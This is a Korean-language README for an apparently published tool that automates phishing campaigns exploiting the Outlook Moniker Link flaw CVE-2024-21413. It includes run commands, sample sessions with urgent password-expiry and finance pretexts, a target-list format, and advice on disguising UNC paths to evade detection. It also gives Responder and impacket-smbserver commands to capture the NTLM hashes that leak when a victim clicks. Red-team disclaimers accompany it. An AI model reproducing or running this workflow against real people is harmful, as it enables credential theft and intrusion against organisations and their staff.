
CVE-2024-21413 (Moniker Link)를 활용한 표적 피싱 캠페인 시뮬레이션을 위한 보안 연구 도구입니다.
CVE-2024-21413 Moniker Link 취약점을 이용한 표적 피싱 캠페인 시뮬레이션을 위한 보안 연구 도구입니다. 공인된 레드팀 운영, 침투 테스트 및 보안 인식 교육을 위해 설계되었습니다.
BLIND TRUST는 보안 팀이 정교한 이메일 기반 공격에 대한 방어를 이해하고 테스트하는 데 도움을 주는 피싱 캠페인 프레임워크입니다. Moniker Link 기법을 활용하여 Outlook의 Protected View를 우회하며, 조직이 보안 태세를 강화하는 데 사용할 수 있는 현실적인 공격 시뮬레이션을 제공합니다.
이 도구는 구성부터 이메일 전송까지 엔드투엔드 캠페인 워크플로를 자동화하며, 사용자 정의 가능한 UNC 경로와 유연한 구실(pretext) 옵션을 통해 운영 보안을 유지합니다.
조직이 효과적으로 방어하려면 실제 공격 기법을 이해해야 합니다. TRUST를 통해 다음과 같은 작업이 가능합니다.
.txt 파일을 통해 대상 로드# 저장소 클론
git clone https://github.com/h1ssbl1tz/Blind-Trust.git
cd TRUST
# 도구 실행
python3 TRUST_v7.py
이 도구는 Python 표준 라이브러리 모듈만 사용합니다.
getpass - 안전한 비밀번호 입력
html - HTML 이스케이프
ipaddress - IP 주소 검증
logging - 구조화된 로깅
os - 파일 작업
re - 정규 표현식
signal - 시그널 처리
smtplib - SMTP 이메일 프로토콜
sys - 시스템 유틸리티
time - 시간 작업
dataclasses - 구성 모델링
email - MIME 이메일 구성
typing - 타입 힌트
외부 패키지 필요 없음 — Python 3.7+가 설치된 모든 곳에서 실행 가능.
python3 TRUST_v7.py
대화형 마법사를 통해 5단계를 진행합니다.
Load targets from [f]ile or [i]nput directly?: i
Target email address(es): [email protected], [email protected]
Email subject [Security Update Required]: 긴급: 비밀번호 만료 알림
Display name (From field) [Microsoft Security Center]: IT 보안팀
Email body text: 비밀번호가 24시간 내에 만료됩니다. 즉시 업데이트해 주세요.
UNC host (IP or domain) [192.168.1.100]: it-internal.company.com
UNC share name [updates]: patches
UNC exploit name [patch]: kb_security_2024
targets.txt 파일 생성:
# 재무 부서
[email protected]
[email protected]
[email protected]
# 회계
[email protected]
[email protected]
그런 다음 실행:
Load targets from [f]ile or [i]nput directly?: f
Path to targets file: targets.txt
[+] Loaded 5 target(s) from targets.txt
Email subject: Q3 재무 검토 - 조치 필요
Display name: 재무 운영팀
Email body: 첨부된 Q3 재무제표를 검토하고 승인해 주시기 바랍니다.
UNC host: finance-internal.company.com
UNC share: quarterly
UNC exploit: q3_financial_report
Generated UNC path: file://finance-internal.company.com/quarterly!q3_financial_report
두 가지 옵션:
#으로 시작하는 주석이 있는 .txt 파일에서 로드명백한 시그니처를 피하는 부분입니다.
finance-internal.company.com) 사용quarterly, updates, documents와 같은 현실적인 공유 이름q3_report, security_patch, training_document와 같은 현실적인 파일 이름결과: 명백한 \\192.168.1.100\share!exploit 대신 file://finance-internal.company.com/quarterly!q3_report와 같은 형태가 됩니다.
시작
↓
[1단계] 공격자 이메일 및 SMTP 비밀번호 입력
↓
[2단계] SMB 리스너 IP 입력
↓
[3단계] 대상 이메일 로드 (파일 또는 입력)
↓
↓→ 각 대상에 대해:
│ - 이메일 형식 검증
│ - 중복 확인
│
[4단계] 이메일 구실 입력
│ - 제목, 보낸 사람 이름, 본문 텍스트
│
[5단계] UNC 경로 사용자 정의 입력
│ - 호스트, 공유, 익스플로잇 이름
│
↓
[구축] 구성 객체 생성
↓
[검증] 모든 필드가 존재하고 유효한지 확인
↓
[요약] 전송 전 요약 표시
↓
[확인] 사용자 승인 또는 취소
↓
[전송] 각 대상에 대해:
│ - 사용자 정의 Moniker Link가 포함된 MIME 이메일 생성
│ - 재시도 로직을 사용한 SMTP 전송 시도
│ - 대상별 성공/실패 로깅
│
↓
[보고] 캠페인 결과 표시 (전송 성공 vs 실패)
↓
종료
CVE-2024-21413 (Moniker Link)은 ! 문자가 포함된 file:// URL을 삽입할 수 있는 Outlook 취약점입니다. 사용자가 해당 링크를 클릭하면 Outlook이 UNC 경로에 액세스하려고 시도하며, Protected View 모드에서도 NTLM 인증 시도가 발생합니다.
\\host\share!exploit에 액세스 시도! 문자가 Protected View를 우회TRUST는 전달 단계를 자동화합니다.
해결책: SMTP 자격 증명을 확인하세요. Gmail의 경우 앱 비밀번호를 사용하세요. 회사 메일의 경우 SMTP 관리자에게 문의하세요.
해결책: 일부 SMTP 서버에서는 정상입니다. 연결은 TLS 암호화 없이 진행됩니다.
해결책: 워드리스트 파일의 이메일이 완전하고 유효한 형식([email protected])인지 확인하세요.
해결책: 대상 서버에 해당 이메일 주소가 없거나 서버가 계정에서 릴레이를 차단하고 있습니다.
해결책: 파일 경로가 올바르고 현재 디렉터리에 파일이 존재하는지 확인하세요.
Q: 이 도구를 사용하는 것이 합법인가요? A: 테스트 중인 조직의 명시적인 서면 승인이 있는 경우에만 가능합니다. 허가 없는 피싱은 불법입니다. 항상 서면으로 된 작업 범위 및 참여 규칙을 확보하세요.
Q: 고급 이메일 필터를 우회할 수 있나요? A: 현실적인 시뮬레이션이지만, 최신 이메일 보안 장비가 이를 탐지할 수도 있습니다. 그게 바로 요점입니다. 조직의 필터가 이에 실패한다면 해결해야 할 문제가 있는 것입니다.
Q: 왜 UNC 경로를 사용자 정의하나요?
A: 원래 \\IP\share!exploit 형태는 너무 뻔합니다. 실제 공격자는 현실적인 경로를 사용합니다. 보안 팀은 명백한 지표와 미묘한 지표를 모두 탐지할 수 있어야 합니다.
Q: 직원 교육에 사용할 수 있나요? A: 네. 승인된 테스트 후에, 보안 인식 교육에서 익명화된 캠페인 예시를 사용하여 직원들에게 실제 공격 기법을 보여줄 수 있습니다.
Q: 이 도구가 자격 증명을 캡처하나요? A: 아니요. TRUST는 이메일 전송만 수행합니다. 대상이 링크를 클릭할 때 NTLM 해시를 캡처하려면 별도의 SMB 리스너(Responder, impacket-smbserver 등)가 필요합니다.
Q: SMB 리스너를 어떻게 설정하나요? A: Linux에서 Responder 또는 impacket-smbserver를 사용하세요.
# Responder (해시 캡처)
sudo responder -i eth0 -v
# impacket-smbserver (파일 서버 시뮬레이션)
impacket-smbserver Share /tmp -smb2support
이 도구는 공인된 보안 테스트용으로만 사용해야 합니다.
TRUST를 사용함으로써 귀하는 법적 영향을 이해하고 적절한 승인을 받았음을 인정하는 것입니다.
이 프로젝트는 사용 제한 조항이 추가된 MIT 라이선스 하에 배포됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.
이 프로젝트는 CMNatic (https://github.com/cmnatic)의 원본 CVE-2024-21413 연구 및 구현을 기반으로 하고 영감을 받았습니다.
CMNatic은 다음에 대한 모든 공로를 인정받습니다.
이 저장소는 해당 작업의 수정 및 확장 버전으로, 다음과 같은 개선 사항이 포함되어 있습니다.
보다 자세한 저작권 표시는 CREDITS.md를 참조하세요.
H1SS - 보안 연구 및 공인된 테스트 목적으로 이 버전을 확장 및 유지 관리합니다.